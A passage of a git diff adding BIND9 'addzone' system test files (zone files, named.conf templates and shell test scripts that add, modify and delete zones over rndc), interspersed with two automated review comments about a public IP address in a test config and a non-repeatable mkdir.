+@ 0 SOA . . 1 0 0 0 0
+@ 0 NS .
diff --git a/bin/tests/system/addzone/ns2/added.db b/bin/tests/system/addzone/ns2/added.db
new file mode 100644
index 0000000..286e717
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/added.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+;$ORIGIN added.example.
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/addzone/ns2/default.nzf.in b/bin/tests/system/addzone/ns2/default.nzf.in
new file mode 100644
index 0000000..d9740f5
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/default.nzf.in
@@ -0,0 +1,14 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+zone previous.example { type primary; file "previous.db"; };
diff --git a/bin/tests/system/addzone/ns2/hints.db b/bin/tests/system/addzone/ns2/hints.db
new file mode 100644
index 0000000..e0f186c
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/hints.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.1
diff --git a/bin/tests/system/addzone/ns2/inline.db b/bin/tests/system/addzone/ns2/inline.db
new file mode 100644
index 0000000..c968104
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/inline.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN inline.example.
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/addzone/ns2/named1.conf.in b/bin/tests/system/addzone/ns2/named1.conf.in
new file mode 100644
index 0000000..eb8519a
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/named1.conf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ allow-query { any; };
+ recursion no;
+ allow-new-zones yes;
+};
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "normal.example" {
+ type primary;
+ file "normal.db";
+};
+
+zone "finaldot.example." {
+ type primary;
+ file "normal.db";
+};
diff --git a/bin/tests/system/addzone/ns2/named2.conf.in b/bin/tests/system/addzone/ns2/named2.conf.in
new file mode 100644
index 0000000..33e45b9
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/named2.conf.in
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion no;
+};
+
+view internal {
+ match-clients { 10.53.0.2; };
+ allow-new-zones no;
+ recursion yes;
+
+ response-policy { zone "policy"; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "policy" {
+ type primary;
+ file "normal.db";
+ };
+};
+
+view external {
+ match-clients { any; };
+ allow-new-zones yes;
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+};
+
+# This view is only here to test that configuration context is cleaned
+# up correctly when using multiple named ACLs (regression test for RT #22739)
+acl match { none; };
+acl nobody { none; };
+view extra {
+ match-clients { match; };
+ allow-new-zones yes;
+ allow-transfer { nobody; };
+ allow-query { nobody; };
+ allow-recursion { nobody; };
+};
diff --git a/bin/tests/system/addzone/ns2/named3.conf.in b/bin/tests/system/addzone/ns2/named3.conf.in
new file mode 100644
index 0000000..697d279
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/named3.conf.in
@@ -0,0 +1,77 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; 10.53.0.4; 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion no;
+ new-zones-directory "new-zones";
+};
+
+view internal {
+ match-clients { 10.53.0.2; };
+ allow-new-zones no;
+ recursion yes;
+
+ response-policy { zone "policy"; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "policy" {
+ type primary;
+ file "normal.db";
+ };
+};
+
+view directory {
+ match-clients { 10.53.0.5; };
+ allow-new-zones yes;
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+};
+
+view external {
+ match-clients { any; };
+ allow-new-zones yes;
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+};
+
+# This view is only here to test that configuration context is cleaned
+# up correctly when using multiple named ACLs (regression test for RT #22739)
+acl match { none; };
+acl nobody { none; };
+view extra {
+ match-clients { match; };
+ allow-new-zones yes;
+ allow-transfer { nobody; };
+ allow-query { nobody; };
+ allow-recursion { nobody; };
+};
diff --git a/bin/tests/system/addzone/ns2/normal.db b/bin/tests/system/addzone/ns2/normal.db
new file mode 100644
index 0000000..fa05638
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/normal.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN normal.example.
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/addzone/ns2/previous.db b/bin/tests/system/addzone/ns2/previous.db
new file mode 100644
index 0000000..6d2e495
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/previous.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN previous.example.
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/addzone/ns2/redirect.db.1 b/bin/tests/system/addzone/ns2/redirect.db.1
new file mode 100644
index 0000000..5dcdd1b
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/redirect.db.1
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 0 0 0 0 0
+@ 0 NS .
diff --git a/bin/tests/system/addzone/ns2/redirect.db.2 b/bin/tests/system/addzone/ns2/redirect.db.2
new file mode 100644
index 0000000..4dcbdbc
--- /dev/null
+++ b/bin/tests/system/addzone/ns2/redirect.db.2
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 1 0 0 0 0
+@ 0 NS .
diff --git a/bin/tests/system/addzone/ns3/e.db b/bin/tests/system/addzone/ns3/e.db
new file mode 100644
index 0000000..7f74f0a
--- /dev/null
+++ b/bin/tests/system/addzone/ns3/e.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA ns3 hostmaster 0 0 0 0 0
+@ NS ns3
+ns3 A 10.53.0.3
diff --git a/bin/tests/system/addzone/ns3/example.db b/bin/tests/system/addzone/ns3/example.db
new file mode 100644
index 0000000..2bf4f8d
--- /dev/null
+++ b/bin/tests/system/addzone/ns3/example.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ IN SOA localhost. localhost.localhost. 1 10800 3600 605800 86400
+@ IN NS localhost.
diff --git a/bin/tests/system/addzone/ns3/named1.conf.in b/bin/tests/system/addzone/ns3/named1.conf.in
new file mode 100644
index 0000000..f1488f4
--- /dev/null
+++ b/bin/tests/system/addzone/ns3/named1.conf.in
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ allow-query { any; };
+ recursion no;
+ allow-new-zones yes;
+};
+
+zone "." {
+ type primary;
+ file "redirect.db";
+};
+
+primaries "test" {
+ 192.5.5.241;
+};
diff --git a/bin/tests/system/addzone/ns3/named2.conf.in b/bin/tests/system/addzone/ns3/named2.conf.in
new file mode 100644
index 0000000..3b56d64
--- /dev/null
+++ b/bin/tests/system/addzone/ns3/named2.conf.in
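Review bot: The `primaries "test"` list at the end of ns3/named1.conf.in points at 192.5.5.241, a publicly routable address (the one published for f.root-servers.net), unlike the 10.53.0.x addresses the test servers themselves listen on. Nothing visible in this hunk references the list, so it appears to exist only so that its name can be used later; if a zone using it were ever loaded, the test server would attempt to contact a real external host. If only the name matters, a comment such as `/* never contacted: only the list name is exercised by the test */` would record that; otherwise an address from a documentation range, e.g. `192.0.2.1;`, avoids the external traffic. Check the test script for expected output that embeds the address before changing it.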
@@ -0,0 +1,28 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "../../common/rndc.key";
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ allow-query { any; };
+ recursion no;
+ allow-new-zones yes;
+};
diff --git a/bin/tests/system/addzone/ns3/redirect.db.1 b/bin/tests/system/addzone/ns3/redirect.db.1
new file mode 100644
index 0000000..60a2622
--- /dev/null
+++ b/bin/tests/system/addzone/ns3/redirect.db.1
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 0 0 0 0 0
+@ 0 NS .
+@ 0 A 127.0.0.1
diff --git a/bin/tests/system/addzone/ns3/redirect.db.2 b/bin/tests/system/addzone/ns3/redirect.db.2
new file mode 100644
index 0000000..3804fef
--- /dev/null
+++ b/bin/tests/system/addzone/ns3/redirect.db.2
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 1 0 0 0 0
+@ 0 NS .
+@ 0 A 127.0.0.1
diff --git a/bin/tests/system/addzone/setup.sh b/bin/tests/system/addzone/setup.sh
new file mode 100644
index 0000000..0730553
--- /dev/null
+++ b/bin/tests/system/addzone/setup.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+cp -f ns1/redirect.db.1 ns1/redirect.db
+cp -f ns2/redirect.db.1 ns2/redirect.db
+cp -f ns3/redirect.db.1 ns3/redirect.db
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named1.conf.in ns2/named.conf
+copy_setports ns3/named1.conf.in ns3/named.conf
+
+cp -f ns2/default.nzf.in ns2/3bf305731dd26307.nzf
+mkdir ns2/new-zones
diff --git a/bin/tests/system/addzone/tests.sh b/bin/tests/system/addzone/tests.sh
new file mode 100755
index 0000000..b3e21c6
--- /dev/null
+++ b/bin/tests/system/addzone/tests.sh
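Review bot: `mkdir ns2/new-zones` on the last line of setup.sh fails if the directory is left over from an earlier run (unless a clean-up script outside this section removes it), and since the script neither sets `set -e` nor checks any exit status, that failure, like a failed `cp` or `copy_setports`, passes silently and only surfaces later as confusing test results. `mkdir -p ns2/new-zones` makes the step repeatable. The target name in `cp -f ns2/default.nzf.in ns2/3bf305731dd26307.nzf` is also unexplained; a one-line comment stating how that file name is derived (presumably a hash of the default view name, to be confirmed) would help whoever has to regenerate it.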
@@ -0,0 +1,755 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +nocmd +norec +noques +noauth +noadd +nostats +dnssec -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +check_zonestatus() ( + $RNDCCMD "10.53.0.$1" zonestatus -redirect > "zonestatus.out.ns$1.$n" && + grep "type: redirect" "zonestatus.out.ns$1.$n" > /dev/null && + grep "serial: 1" "zonestatus.out.ns$1.$n" > /dev/null +) + +status=0 +n=0 + +echo_i "checking normally loaded zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 a.normal.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.normal.example' dig.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +# When LMDB support is compiled in, this tests that migration from +# NZF to NZD occurs during named startup +echo_i "checking previously added zone ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.2 a.previous.example a > dig.out.ns2.$n || ret=1 +grep 'status: NOERROR' dig.out.ns2.$n > /dev/null || ret=1 +grep '^a.previous.example' dig.out.ns2.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $FEATURETEST --with-lmdb; then + echo_i "checking that existing NZF file was renamed after migration ($n)" + [ -e ns2/3bf305731dd26307.nzf~ ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "adding new zone ($n)" +ret=0 
+$RNDCCMD 10.53.0.2 addzone 'added.example { type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_adding_new_zone () ( + $DIG $DIGOPTS @10.53.0.2 a.added.example a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_adding_new_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +nextpart ns2/named.run >/dev/null +echo_i "checking addzone errors are logged correctly" +ret=0 +$RNDCCMD 10.53.0.2 addzone bad.example '{ type mister; };' 2>&1 | grep 'unexpected token' > /dev/null 2>&1 || ret=1 +wait_for_log_peek 20 "addzone: 'mister' unexpected" ns2/named.run || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +nextpart ns2/named.run >/dev/null +echo_i "checking modzone errors are logged correctly" +ret=0 +$RNDCCMD 10.53.0.2 modzone added.example '{ type mister; };' 2>&1 | grep 'unexpected token' > /dev/null 2>&1 || ret=1 +wait_for_log_peek 20 "modzone: 'mister' unexpected" ns2/named.run || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding a zone that requires quotes ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"32/1.0.0.127-in-addr.added.example" { +check-names ignore; type primary; file "added.db"; };' 2>&1 | sed 's/^/I:ns2 /' +_check_zone_that_requires_quotes() ( + $DIG $DIGOPTS @10.53.0.2 "a.32/1.0.0.127-in-addr.added.example" a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.32/1.0.0.127-in-addr.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_zone_that_requires_quotes || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding a zone with a quote in the name ($n)" +ret=0 +$RNDCCMD 10.53.0.2 addzone '"foo\"bar.example" { check-names ignore; type primary; file "added.db"; };' 
2>&1 | sed 's/^/I:ns2 /' +_check_zone_with_a_quote() ( + $DIG $DIGOPTS @10.53.0.2 "a.foo\"bar.example" a > dig.out.ns2.$n && + grep 'status: NOERROR' dig.out.ns2.$n > /dev/null && + grep '^a.foo\\"bar.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_zone_with_a_quote || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "adding new zone with missing file ($n)" +ret=0 +$DIG $DIGOPTS +all @10.53.0.2 a.missing.example a > dig.out.ns2.pre.$n || ret=1 +grep "status: REFUSED" dig.out.ns2.pre.$n > /dev/null || ret=1 +$RNDCCMD 10.53.0.2 addzone 'missing.example { type primary; file "missing.db"; };' 2> rndc.out.ns2.$n +grep "file not found" rndc.out.ns2.$n > /dev/null || ret=1 +$DIG $DIGOPTS +all @10.53.0.2 a.missing.example a > dig.out.ns2.post.$n || ret=1 +grep "status: REFUSED" dig.out.ns2.post.$n > /dev/null || ret=1 +digcomp dig.out.ns2.pre.$n dig.out.ns2.post.$n || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if ! 
$FEATURETEST --with-lmdb; then + echo_i "verifying no comments in NZF file ($n)" + ret=0 + hcount=`grep "^# New zone file for view: _default" ns2/3bf305731dd26307.nzf | wc -l` + [ $hcount -eq 0 ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "checking rndc showzone with previously added zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 showzone previous.example > rndc.out.ns2.$n +expected='zone "previous.example" { type primary; file "previous.db"; };' +[ "`cat rndc.out.ns2.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +if $FEATURETEST --with-lmdb; then + echo_i "checking zone is present in NZD ($n)" + ret=0 + $NZD2NZF ns2/_default.nzd | grep previous.example > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "deleting previously added zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone previous.example 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_previously_added_zone() ( + $DIG $DIGOPTS @10.53.0.2 a.previous.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep '^a.previous.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_previously_added_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +check_nzd2nzf() ( + $NZD2NZF ns2/_default.nzd > nzd2nzf.out.$n && + ! grep previous.example nzd2nzf.out.$n > /dev/null +) + +if $FEATURETEST --with-lmdb; then + echo_i "checking zone was deleted from NZD ($n)" + retry_quiet 10 check_nzd2nzf || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +if ! 
$FEATURETEST --with-lmdb; then + echo_i "checking NZF file now has comment ($n)" + ret=0 + hcount=`grep "^# New zone file for view: _default" ns2/3bf305731dd26307.nzf | wc -l` + [ $hcount -eq 1 ] || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +fi + +echo_i "deleting newly added zone added.example ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone added.example 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_newly_added_zone() ( + $DIG $DIGOPTS @10.53.0.2 a.added.example a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep '^a.added.example' dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_newly_added_zone || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "deleting newly added zone with escaped quote ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone "foo\\\"bar.example" 2>&1 | sed 's/^/I:ns2 /' +_check_deleting_newly_added_zone_quote() ( + $DIG $DIGOPTS @10.53.0.2 "a.foo\"bar.example" a > dig.out.ns2.$n && + grep 'status: REFUSED' dig.out.ns2.$n > /dev/null && + ! grep "^a.foo\"bar.example" dig.out.ns2.$n > /dev/null +) +retry_quiet 10 _check_deleting_newly_added_zone_quote || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with a normally-loaded zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 showzone normal.example > rndc.out.ns2.$n +expected='zone "normal.example" { type primary; file "normal.db"; };' +[ "`cat rndc.out.ns2.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with a normally-loaded zone with trailing dot ($n)" +ret=0 +$RNDCCMD 10.53.0.2 showzone finaldot.example > rndc.out.ns2.$n +expected='zone "finaldot.example." 
{ type primary; file "normal.db"; };' +[ "`cat rndc.out.ns2.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc showzone with a normally-loaded redirect zone ($n)" +ret=0 +$RNDCCMD 10.53.0.1 showzone -redirect > rndc.out.ns1.$n +expected='zone "." { type redirect; file "redirect.db"; };' +[ "`cat rndc.out.ns1.$n`" = "$expected" ] || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc zonestatus with a normally-loaded redirect zone ($n)" +ret=0 +$RNDCCMD 10.53.0.1 zonestatus -redirect > rndc.out.ns1.$n +grep "type: redirect" rndc.out.ns1.$n > /dev/null || ret=1 +grep "serial: 0" rndc.out.ns1.$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking rndc reload with a normally-loaded redirect zone ($n)" +ret=0 +sleep 1 +cp -f ns1/redirect.db.2 ns1/redirect.db +$RNDCCMD 10.53.0.1 reload -redirect > rndc.out.ns1.$n +retry_quiet 5 check_zonestatus 1 || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "delete a normally-loaded zone ($n)" +ret=0 +$RNDCCMD 10.53.0.2 delzone normal.example > rndc.out.ns2.$n 2>&1 +grep "is no longer active and will be deleted" rndc.out.ns2.$n > /dev/null || ret=11 +grep "To keep it from returning when the server is restarted" rndc.out.ns2.$n > /dev/null || ret=1 +grep "must also be removed from named.conf." 
